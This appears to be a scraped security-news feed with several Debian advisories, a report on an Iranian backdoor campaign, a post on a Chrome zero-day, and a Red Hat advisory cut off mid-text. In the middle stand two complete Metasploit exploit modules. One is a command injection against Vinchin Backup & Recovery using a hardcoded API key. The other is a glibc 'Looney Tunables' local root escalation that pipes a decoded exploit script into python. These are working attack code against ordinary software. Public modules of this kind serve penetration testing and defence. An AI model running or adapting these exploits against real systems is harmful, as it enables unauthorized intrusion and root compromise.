Debian Linux Security Advisory 5585-1 - An important security issue was discovered in Chromium, which could result in the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5585-1                   security@debian.org  
https://www.debian.org/security/                           Andres Salomon  
December 21, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : chromium  
CVE ID         : CVE-2023-7024

An important security issue was discovered in Chromium, which could result  
in the execution of arbitrary code.

Google is aware that an exploit for CVE-2023-7024 exists in the wild.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 120.0.6099.129-1~deb11u1.

For the stable distribution (bookworm), this problem has been fixed in  
version 120.0.6099.129-1~deb12u1.

We recommend that you upgrade your chromium packages.

For the detailed security status of chromium please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/chromium

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmWEtBwACgkQZF0CR8Nu  
djcwTRAAlSOMympmaRnt7wtj/PasL1BjxHxalhGYU5KxKugz8BmDZN2j+ulLg2c9  
SoJQCIT3RhUyNbWyZV3WKXjSBkn3kE4G/lplL9AIDTHAfy4yrqUo41ews7DMfPQ4  
oNVJhIqIGl+VTaX1zaH50hXJI2Ax294Uo986iGplWScYqnlkcWLNX5RWOtYQLrR7  
BjYzEFIoDouuF5w+7nXyy3nDJYeaBotz1eifayEVYul0k55ljGftzkW5EVrS8zVF  
MeSz0YrXNpqlV6SREVg6jouZxJdNUE1+X72j+dK9rAwR4gcZekcd1JOO+oFfRv86  
jwb3ui8oB3ZJ8K0EPswWK7trq/rFra2T50YvP4wpbwtQ5RG99z612cCgeHZYuLLY  
WW3qWK20lKWbhCwP2S7KXuNFZpVu2ddvj+y4MqMS16HlQyobvQR8obUpwtK1YZSe  
Ak88vaCUk/3ZrFSSggxQQIgSBKtWTLcL7wons5RELGrrowmGZPS+ajpsWtAvGlhJ  
S+QZWkpKlW2F92cl1md7R5zN5vAeVQqW6w20eDebbk4HLgGv6wqgEVNyRcQXUKh/  
3GqGvbuPAoo+gVqGybr+Efmb/xnZn2Y7/AbmjatjA3Iq2Z+NJNUBVahXeZ1s4b5U  
SuvktcJ0szrqOPYNNBkx35/5rSy6nb1KoStG4lvX8XMMese5Ty8=xniE  
-----END PGP SIGNATURE-----

Debian Security Advisory 5585-1

Debian Linux Security Advisory 5584-1 - It was reported that the BlueZ's HID profile implementation is not inline with the HID specification which mandates the use of Security Mode 4. The HID profile configuration option ClassicBondedOnly now defaults to "true" to make sure that input connections only come from bonded device connections.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5584-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
December 21, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : bluez  
CVE ID         : CVE-2023-45866  
Debian Bug     : 1057914

It was reported that the BlueZ's HID profile implementation is not  
inline with the HID specification which mandates the use of Security  
Mode 4.  The HID profile configuration option ClassicBondedOnly now  
defaults to "true" to make sure that input connections only come from  
bonded device connections.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 5.55-3.1+deb11u1.

For the stable distribution (bookworm), this problem has been fixed in  
version 5.66-1+deb12u1.

We recommend that you upgrade your bluez packages.

For the detailed security status of bluez please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/bluez

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmWElXhfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Qbdw/+Ly8+kB39iFkiQiFluySzb1mPvYHz0RBYx5aa8iLhWU6SuuZwFGv1ZNTf  
r16whtZOmBGYPDjJrRbksd01rNxIlwW8jaNPCOiDySYqrw3Ni0cbWRYrtNSjzOYJ  
cwoPg+4OYEiY+0HkAuTaAfctD5Nyf6sIN2dMsy3VERxZAlRFMUElAVn2obhRoW3P  
VtQHfVsedGcVsmxHS72MnXIEBYhFu9Q+lA80qfteiPBnQUFo41DeV1ar1uGBhDWG  
qwkl+8+etRYhnLMnX361Hd+5eVAC8IIQQaFR+5lfq7VydIcDcV2gpENOxNj4G3T1  
TSJ+ts6BX9BSuPVXFckymid71bbUJ+1r/IpvA8nlc+UIDTPmpZygijohMkjOpuNH  
kwkPVuRNmOAH6/umh7auZn5donXaPA8k303EUvaMNpGxfmD3jxdLsDwrrE/qRtGv  
kPCV67y0N6ZaN1d8wxuIcQ4aiQVAgNlmi9hhAfYhhhdt3y/oGcqMT2iUPQIla3Wj  
sWRUYt8mTcZdG2g00WBj+DTh0EuUwd9ILYPfSK+zWf+ikQ1+LrQvfVEMD1ejWmIg  
QI6vxwN9wiim9PydlAbtlsQ4vb/246MPuWbXcRS3omW3CvK86i0GpSVvpjrr2DmB  
pQ4rYr6bFcVINzLr79lz5GMGIpuShCllrtLkXofyfhinvNthKZs=DXXJ  
-----END PGP SIGNATURE-----

Debian Security Advisory 5584-1

Debian Linux Security Advisory 5583-1 - A buffer overflow was discovered in the AV1 video plugin for the GStreamer media framework, which may result in denial of service or potentially the execution of arbitrary code if a malformed media file is opened.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5583-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
December 21, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : gst-plugins-bad1.0  
CVE ID         : not yet available

A buffer overflow was discovered in the AV1 video plugin for the  
GStreamer media framework, which may result in denial of service or  
potentially the execution of arbitrary code if a malformed media file  
is opened.

The oldstable distribution (bullseye) is not affected.

For the stable distribution (bookworm), this problem has been fixed in  
version 1.22.0-4+deb12u4.

We recommend that you upgrade your gst-plugins-bad1.0 packages.

For the detailed security status of gst-plugins-bad1.0 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/gst-plugins-bad1.0

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmWEkCMACgkQEMKTtsN8  
TjZOGQ/+P4p0HpeYQLjyb0UwvQ8XuLMd0BHI9AeBXAAvm2apCwIALqqTeMZ86YId  
XE/QiVqFccIMJ4GiyQyiSZLcS9py9RDLzw/y3pefi8n1gZdfLBJEvJtlYsPV0FD2  
/a71aMG2hHqK2ez45mvsLJmGbanBaslC6cbJ5+/Y8psWBDq28VYEp3Zb5HnuHy2U  
7lZIpZ1cQeChaE7ef+Qbnep6c8Lxyjf4fyBj2K5PqgsFuxqwCzzkPQDDA6A5AAUI  
DsdA27iTthBAOKjFJvh3TPuEdnFtMZghsYo0YU8OoJl47/gJhx36gFFivyudWYKN  
IHxOVbyNsmAphUDfwUyJUxKKbcFgx59AvTNSD2v2N7ulehYIN3GWjRgLtm30HX45  
fPMhzoVQJHTBLmqtUviKc9pJPPV4bctt82p5iuCQ8DZHHImtYsJQbbBzzpjtv9DA  
zXRp/XyJoZwCLuIvwvcc0kYMo0E7CkGFHWfMJvVFmAkokc4N1bw3F/PEolhrlXwE  
Kx25Zif6HlX2QR7ReADL/fe9JdJqGYjLkq9KXHteg4VLpBx6cB+6Wcie76ONeA5C  
MWzancxEwMN2gSXymwB7gAtA3dKA2Dct34Gm0rdnRVR2Iafy4YyaIVbszUvHX5XB  
LHTHg0UNz7plbefH3kPBVCCz/G/AwHeK0DNusO8HNIwQAVZyV60m0j  
-----END PGP SIGNATURE-----

Debian Security Advisory 5583-1

Debian Linux Security Advisory 5582-1 - Multiple security issues were discovered in Thunderbird, which could result in denial of service, the execution of arbitrary code or spoofing of signed PGP/MIME and SMIME emails.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5582-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffDecember 21, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : thunderbirdCVE ID         : CVE-2023-6856 CVE-2023-6857 CVE-2023-6858 CVE-2023-6859                 CVE-2023-6860 CVE-2023-6861 CVE-2023-6862 CVE-2023-6864                 CVE-2023-6873 CVE-2023-50761 CVE-2023-50762Multiple security issues were discovered in Thunderbird, which couldresult in denial of service, the execution of arbitrary code or spoofingof signed PGP/MIME and SMIME emails.For the oldstable distribution (bullseye), these problems have been fixedin version 1:115.6.0-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 1:115.6.0-1~deb12u1.We recommend that you upgrade your thunderbird packages.For the detailed security status of thunderbird please refer toits security tracker page at:https://security-tracker.debian.org/tracker/thunderbirdFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmWEkCEACgkQEMKTtsN8TjYB8xAAiSFGWOK6s+7YGuc28bu4EEUHG2sUXJ9g43AD9DftxhVlz1fh2GbyXxpLDyoq3rrZU3n8bVQTWLcfRcdLYOZlMNEaxN8K89lGRfh+864anLQIGGII3gsCC8qS3Wx96W9Ydh4++iM55Yopc9SNAFKUKXONYU8dxolSYsDAwkhw4iU97TjURsImOTzmnpyAIvVbG7Uf3HEnyb98KRr8OgbzdkJpg/JFKj5NLxX8QJ1kKpV9/8uYKRxdehNhljlYXt2j5fqaL1jXXcOMkEuMgXjUl5Hq2dh6owEPkfHDRMMLLypsuCXDz+i4mAyYQGgrdNYshf876OT4cmf2O3d/lXExWdcALWGRd3/tLSB7KIoRUtit/+OZT6/jVvSjr4g4vfQvQHC7JlvUmrglmKrHQ3J4b0TEeMN3GIrUadMFSVG2C8pfS23e91AtF6Jyeg00ZvP8/voUiHWymJTgJesDxHsHK1ZRMqulaIHwNuS+DieOW2mqNmb/exuJ4v35XwIFCrMBzmOkxDrfdiSLciXA2+qcdKW7QM+hK2hEzZBaw31OHgHTPZwzd2sMx9UDrKaejR/xKIMRgscqQcdISdsQTCmbFO98/iyiUXUF+j+itvdqrnaAn8ZEMtPj1dm54YzDuuZrWDrQ/IYxUz66x7NzQFAZKJc41toPY3u5aIx+lXOQZyAÛG4-----END PGP SIGNATURE-----

Debian Security Advisory 5582-1

Organizations in the Defense Industrial Base (DIB) sector are in the crosshairs of an Iranian threat actor as part of a campaign designed to deliver a never-before-seen backdoor called FalseFont.
The findings come from Microsoft, which is tracking the activity under its weather-themed moniker Peach Sandstorm (formerly Holmium), which is also known as APT33, Elfin, and Refined Kitten.
"

Threat Intelligence / Supply Chain Attack

Organizations in the Defense Industrial Base (DIB) sector are in the crosshairs of an Iranian threat actor as part of a campaign designed to deliver a never-before-seen backdoor called FalseFont.

The findings come from Microsoft, which is tracking the activity under its weather-themed moniker **Peach Sandstorm** (formerly Holmium), which is also known as APT33, Elfin, and Refined Kitten.

"FalseFont is a custom backdoor with a wide range of functionalities that allow operators to remotely access an infected system, launch additional files, and send information to its \[command-and-control\] servers," the Microsoft Threat Intelligence team said on X (previously Twitter).

UPCOMING WEBINAR

Beat AI-Powered Threats with Zero Trust - Webinar for Security Professionals

Traditional security measures won't cut it in today's world. It's time for Zero Trust Security. Secure your data like never before.

Join Now

The first recorded use of the implant was in early November 2023.

The tech giant further said that the latest development aligns with previous activity from Peach Sandstorm and demonstrates a continued evolution of the threat actor's tradecraft.

In a report published in September 2023, Microsoft linked the group to password spray attacks carried out against thousands of organizations globally between February and July 2023. The intrusions primarily singled out satellite, defense, and pharmaceutical sectors.

The end goal, the company said, is to facilitate intelligence collection in support of Iranian state interests. Peach Sandstorm is believed to have been active since at least 2013.

The disclosure comes as the Israel National Cyber Directorate (INCD) accused Iran and Hezbollah of attempting to unsuccessfully target Ziv Hospital through hacking crews named Agrius and Lebanese Cedar.

The agency also revealed details of a phishing campaign in which a fake advisory for a security flaw in F5 BIG-IP products is employed as a decoy to deliver wiper malware on Windows and Linux systems.

The lure for the targeted attack is a critical authentication bypass vulnerability (CVE-2023-46747, CVSS score: 9.8) that came to light in late October 2023. The scale of the campaign is currently unknown.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Warns of New 'FalseFont' Backdoor Targeting the Defense Sector

Google has issued an emergency update for Chrome that fixes an actively exploited zero-day vulnerability in the WebRTC component.

Google has released an emergency security update for Chrome that brings the browser’s Stable channel to version 120.0.6099.129 for Mac, Linux and to 120.0.6099.129/130 for Windows. This update includes one security fix for a vulnerability that was subject to an existing exploit.

The easiest way to update Chrome is to allow it to update automatically, which basically uses the same method as outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong—such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time, given the severity of the vulnerability in this patch. My preferred method is to have Chrome open the page _chrome://settings/help_ which you can also find by clicking **Settings > About Chrome**.

If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete.

After the update, the version should be 120.0.6099.129, or later.

Google never gives out a lot of information about vulnerabilities, for obvious reasons. Access to bug details and links may be kept restricted until a majority of users are updated with a fix. However, from the update page we can learn a few things.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The zero-day patched in this update is listed as CVE-2023-7024, a heap buffer overflow in Web Real-Time Communications (WebRTC).

WebRTC on Chrome is the first true in-browser solution to real-time communications (RTC). It supports video, voice, and generic data to be sent between peers, allowing developers to build powerful voice- and video-communication solutions. The technology is available on all modern browsers as well as on native clients for all major platforms.

A WebRTC application will usually go through a common application flow. Access the media devices, open peer connections, discover peers, and start streaming.

A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. In software exploit code, two common areas that are targeted for overflows are the stack and the heap.

The heap is an area of memory made available for use by the program. The program can request blocks of memory for its use within the heap. When it uses memory blocks outside of the reserved area, this can influence other programs. This fact can be abused by an attacker.

The vulnerability was reported by members of Google’s Threat Analysis Group. This group frequently finds vulnerabilities that are used by state-sponsored groups in targeted attacks. This could indicate that Google found this vulnerability while researching an active attack, which matches the fact that an exploit for the vulnerability exists in the wild.

Since WebRTC is a Chromium component, users of other Chromium based browsers like Microsoft Edge will probably see a similar update.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Update Chrome now! Emergency update patches zero-day 

This Metasploit module exploits a command injection vulnerability in Vinchin Backup & Recovery v5.0.*, v6.0.*, v6.7.*, and v7.0.*. Due to insufficient input validation in the checkIpExists API endpoint, an attacker can execute arbitrary commands as the web server user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Vinchin Backup and Recovery Command Injection',        'Description' => %q{          This module exploits a command injection vulnerability in Vinchin Backup & Recovery          v5.0.*, v6.0.*, v6.7.*, and v7.0.*. Due to insufficient input validation in the          checkIpExists API endpoint, an attacker can execute arbitrary commands as the          web server user.        },        'License' => MSF_LICENSE,        'Author' => [          'Gregory Boddin (LeakIX)', # Vulnerability discovery          'Valentin Lobstein' # Metasploit module        ],        'References' => [          ['CVE', '2023-45498'],          ['CVE', '2023-45499'],          ['URL', 'https://blog.leakix.net/2023/10/vinchin-backup-rce-chain/'],          ['URL', 'https://vinchin.com/'] # Vendor URL        ],        'DisclosureDate' => '2023-10-26',        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ],          'AKA' => ['Vinchin Command Injection']        },        'Platform' => ['linux', 'unix'],        'Arch' => [ARCH_CMD],        'Targets' => [          ['Automatic', {}]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => true,          'FETCH_WRITABLE_DIR' => '/usr/share/nginx/vinchin/tmp'        },        'Privileged' => false      )    )    register_options(      [        Opt::RPORT(443),        OptString.new('TARGETURI', [true, 'The base path to the Vinchin Backup & Recovery application', '/']),        OptString.new('APIKEY', [true, 'The hardcoded API key', '6e24cc40bfdb6963c04a4f1983c8af71']),      ]    )  end  def exploit    hex_encoded_payload = payload.encoded.unpack('H*').first    formatted_payload = hex_encoded_payload.scan(/../).map { |x| "\\\\x#{x}" }.join    temp_file = "#{datastore['FETCH_WRITABLE_DIR']}/#{Rex::Text.rand_text_alpha(8)}"    command = "echo -e #{formatted_payload}|tee #{temp_file};chmod 777 #{temp_file};#{temp_file};rm #{temp_file}"    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI'], 'api/'),      'vars_get' => {        'm' => '30',        'f' => 'checkIpExists',        'k' => datastore['APIKEY']      },      'data' => "p={\"ip\":\"a||#{command}\"}"    })  end  def check    target_uri_path = normalize_uri(target_uri.path, 'login.php')    res = send_request_cgi('uri' => target_uri_path)    return CheckCode::Unknown('Failed to connect to the target.') unless res    return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200    version_pattern = /Vinchin build: (\d+\.\d+\.\d+\.\d+)/    version_match = res.body.match(version_pattern)    unless version_match && version_match[1]      return CheckCode::Unknown('Unable to extract version.')    end    version = Rex::Version.new(version_match[1])    print_status("Detected Vinchin version: #{version}")    if (version >= Rex::Version.new('5.0.0') && version < Rex::Version.new('5.1.0')) ||       (version >= Rex::Version.new('6.0.0') && version < Rex::Version.new('6.1.0')) ||       (version >= Rex::Version.new('6.7.0') && version < Rex::Version.new('6.8.0')) ||       (version >= Rex::Version.new('7.0.0') && version < Rex::Version.new('7.0.2'))      return CheckCode::Appears    else      return CheckCode::Safe    end  endend

Vinchin Backup And Recovery Command Injection

A buffer overflow exists in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES environment variable. It has been dubbed Looney Tunables. This issue allows an local attacker to use maliciously crafted GLIBC_TUNABLES when launching binaries with SUID permission to execute code in the context of the root user. This Metasploit module targets glibc packaged on Ubuntu and Debian. Fedora 37 and 38 and other distributions of linux also come packaged with versions of glibc vulnerable to CVE-2023-4911 however this module does not target them.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  # includes: is_root?  include Msf::Post::Linux::Priv  # includes: kernel_release  include Msf::Post::Linux::Kernel  # include: get_sysinfo  include Msf::Post::Linux::System  # includes writable?, upload_file, upload_and_chmodx, exploit_data, cd  include Msf::Post::File  # includes register_files_for_cleanup  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  BUILD_IDS = {    '69c048078b6c51fa8744f3d7cff3b0d9369ffd53' => 561,    '3602eac894717d56555552c84fc6b0e4d6a4af72' => 561,    'a99db3715218b641780b04323e4ae5953d68a927' => 561,    'a8daca28288575ffc8c7641d40901b0148958fb1' => 580,    '61ef896a699bb1c2e4e231642b2e1688b2f1a61e' => 560,    '9a9c6aeba5df4178de168e26fe30ddcdab47d374' => 580,    'e7b1e0ff3d359623538f4ae0ac69b3e8db26b674' => 580,    '956d98a11b839e3392fa1b367b1e3fdfc3e662f6' => 322  }  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Glibc Tunables Privilege Escalation CVE-2023-4911 (aka Looney Tunables)',        'Description' => %q{          A buffer overflow exists in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES          environment variable. This issue allows an local attacker to use maliciously crafted GLIBC_TUNABLES when          launching binaries with SUID permission to execute code in the context of the root user.          This module targets glibc packaged on Ubuntu and Debian. The specific glibc versions this module targets are:          Ubuntu:          2.35-0ubuntu3.4 > 2.35          2.37-0ubuntu2.1 > 2.37          2.38-1ubuntu6 > 2.38          Debian:          2.31-13-deb11u7 > 2.31          2.36-9-deb12u3 > 2.36          Fedora 37 and 38 and other distributions of linux also come packaged with versions of glibc vulnerable to CVE-2023-4911          however this module does not target them.        },        'Author' => [          'Qualys Threat Research Unit', # discovery          'blasty <peter@haxx.in>', # PoC          'jheysel-r7' # msf module        ],        'References' => [          ['CVE', '2023-4911'],          ['URL', 'https://haxx.in/files/gnu-acme.py'],          ['URL', 'https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt'],          ['URL', 'https://security-tracker.debian.org/tracker/CVE-2023-4911'],          ['URL', 'https://ubuntu.com/security/CVE-2023-4911']        ],        'License' => MSF_LICENSE,        'Platform' => [ 'linux', 'unix' ],        'Arch' => [ ARCH_X86, ARCH_X64 ],        'SessionTypes' => [ 'shell', 'meterpreter' ],        'Targets' => [[ 'Auto', {} ]],        'Privileged' => true,        'DefaultTarget' => 0,        'DefaultOptions' => {          'PrependSetresgid' => true,          'PrependSetresuid' => true,          'WfsDelay' => 600        },        'DisclosureDate' => '2023-10-03',        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )    register_advanced_options([      OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ])    ])  end  def find_exec_program    %w[python python3].select(&method(:command_exists?)).first  rescue StandardError => e    fail_with(Failure::Unknown, "An error occurred finding a version of python to use: #{e.message}")  end  def check    glibc_version = cmd_exec('ldd --version')&.scan(/ldd\s+$\w+\s+GLIBC\s+(\S+)$/)&.flatten&.first    return CheckCode::Unknown('Could not get the version of glibc') unless glibc_version    sysinfo = get_sysinfo    case sysinfo[:distro]    when 'ubuntu'      # Ubuntu's version looks like: 2.35-0ubuntu3.4. The following massaging is necessary for Rex::Version compatibility      test_version = glibc_version.gsub(/-\d+ubuntu/, '.')      if Rex::Version.new(test_version).between?(Rex::Version.new('2.35'), Rex::Version.new('2.35.3.4')) ||         Rex::Version.new(test_version).between?(Rex::Version.new('2.37'), Rex::Version.new('2.37.2.1')) ||         Rex::Version.new(test_version).between?(Rex::Version.new('2.38'), Rex::Version.new('2.38.6'))        return CheckCode::Appears("The glibc version (#{glibc_version}) found on the target appears to be vulnerable")      end    when 'debian'      # Debian's version looks like: 2.36-9+deb12u1. The following massaging is necessary for Rex::Version compatibility      test_version = glibc_version.gsub(/\+deb/, '.').gsub(/u/, '.').gsub('-', '.')      if Rex::Version.new(test_version).between?(Rex::Version.new('2.31'), Rex::Version.new('2.31.13.11.7')) ||         Rex::Version.new(test_version).between?(Rex::Version.new('2.36'), Rex::Version.new('2.36.9.12.3'))        return CheckCode::Appears("The glibc version (#{glibc_version}) found on the target appears to be vulnerable")      end    else      return CheckCode::Unknown('The module has not been tested against this Linux distribution')    end    CheckCode::Safe("The glibc version (#{glibc_version}) found on the target does not appear to be vulnerable")  end  def check_ld_so_build_id    # Check to ensure the python exploit has the magic offset defined for the BuildID for ld.so    if !command_exists?('file')      print_warning('Unable to locate the `file` command ti  order to verify the BuildID for ld.so, the exploit has a chance of being incompatible with this target.')      return    end    file_cmd_output = ''    # This needs to be split up by distro as Ubuntu has readlink and which installed by default but "ld.so" is not    # defined on the path like it is on Debian. Also Ubuntu doesn't have ldconfig install by default.    sysinfo = get_sysinfo    case sysinfo[:distro]    when 'ubuntu'      if command_exists?('ldconfig')        file_cmd_output = cmd_exec('file $(ldconfig -p | grep -oE "/.*ld-linux.*so\.[0-9]*")')      end    when 'debian'      file_cmd_output = cmd_exec('file "$(readlink -f "$(command -v ld.so)")"')    else      fail_with(Failure::NoTarget, 'The module has not been tested against this Linux distribution')    end    if file_cmd_output =~ /BuildID\[.+\]=(\w+),/      build_id = Regexp.last_match(1)      if BUILD_IDS.keys.include?(build_id)        print_good("The Build ID for ld.so: #{build_id} is in the list of supported Build IDs for the exploit.")      else        fail_with(Failure::NoTarget, "The Build ID for ld.so: #{build_id} is not in the list of supported Build IDs for the exploit.")      end    else      print_warning('Unable to verify the BuildID for ld.so, the exploit has a chance of being incompatible with this target.')    end  end  def exploit    fail_with(Failure::BadConfig, 'Session already has root privileges') if is_root?    python_binary = find_exec_program    fail_with(Failure::NotFound, 'The python binary was not found.') unless python_binary    vprint_status("Using '#{python_binary}' to run the exploit")    check_ld_so_build_id    # The python script assumes the working directory is the one we can write to.    cd(datastore['WritableDir'])    shell_code = payload.encoded.unpack('H*').first    exploit_data = exploit_data('CVE-2023-4911', 'cve_2023_4911.py')    exploit_data = exploit_data.gsub('METASPLOIT_SHELL_CODE', shell_code)    exploit_data = exploit_data.gsub('METASPLOIT_BUILD_IDS', BUILD_IDS.to_s.gsub('=>', ':'))    # If there is no response from cmd_exec after the brief 15s timeout, this indicates exploit is running successfully    output = cmd_exec("echo #{Rex::Text.encode_base64(exploit_data)} |base64 -d | #{python_binary}")    if output.blank?      print_good('The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.')    else      print_line(output)    end  endend

Glibc Tunables Privilege Escalation

Debian Linux Security Advisory 5581-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, sandbox escape or clickjacking.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5581-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffDecember 20, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2023-6856 CVE-2023-6857 CVE-2023-6858 CVE-2023-6859                  CVE-2023-6860 CVE-2023-6861 CVE-2023-6862 CVE-2023-6863                  CVE-2023-6864 CVE-2023-6865 CVE-2023-6867Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode, sandbox escape or clickjacking.For the oldstable distribution (bullseye), these problems have been fixedin version 115.6.0esr-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 115.6.0esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmWDPxAACgkQEMKTtsN8TjYfeRAAql+aZ6PpAM1Fq4Cp1IlvDQc8BYNuKrjn9/4xYgq/bAnQyRGj1I0viHP2dUdZl6CcndqE6NVgm1mYpCQ/TZJpwSSxnoXf46bB/lGNg17Cw7T8gWI5uUSs1K63UOYNMr8HlCF35qZpU0+TrsL+q3qRdkOQOxRLSFHNhxuUQ+44pUJYKDVg6vKjHU91oQEfjzmcgn2Z+tL/zyrt4s57XUGpZNm6Vmg/TUftXL5+CDodCNPRnIw0JBYWu2yfJ3tj6cuCw6jDAcAouAsDcd8CbK28Bf6h2zUossRGVjSfNWeoshK2qe9L3/wlQB62s0wrJ1MimP9k1y9xS4Iy85vf2BDDnVQBNgMR8mKnwt63Jhngpx8JW8oTbBKzx1oiEZkShw3CDWuCx7ooMnR8glwybPJqXMyZbt8H7dMO3IFEwD2dfNzVfwyEUq4JAOzCPasLEwCekXrTTxeZoYdTW4y8c5c4GEd9nvO8Hdk9iV/zbD1uhpgy0g6oQXciAzSH6Rm92u2+HPwNOFjZAJMOi9eyqtdj9PqwHZ1uraXhtqCz8peD/Sg+YZCAXt0lLyVM+WbQqJOyH5n1POeEHbEikv1iMLXRw+Vkkbzr3u9laTdQ9Yn1b/ZfVblG6/N+hhlLLXYBXyYfrU4L6DMTnUave299Cq1fb8RPWVefcqAv6DoQX0P1GHc==8/zE-----END PGP SIGNATURE-----

Debian Security Advisory 5581-1

Red Hat Security Advisory 2023-7886-03 - An update for tigervnc is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7886.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: tigervnc security updateAdvisory ID:        RHSA-2023:7886-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7886Issue date:         2023-12-20Revision:           03CVE Names:          CVE-2023-6377====================================================================Summary: An update for tigervnc is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine 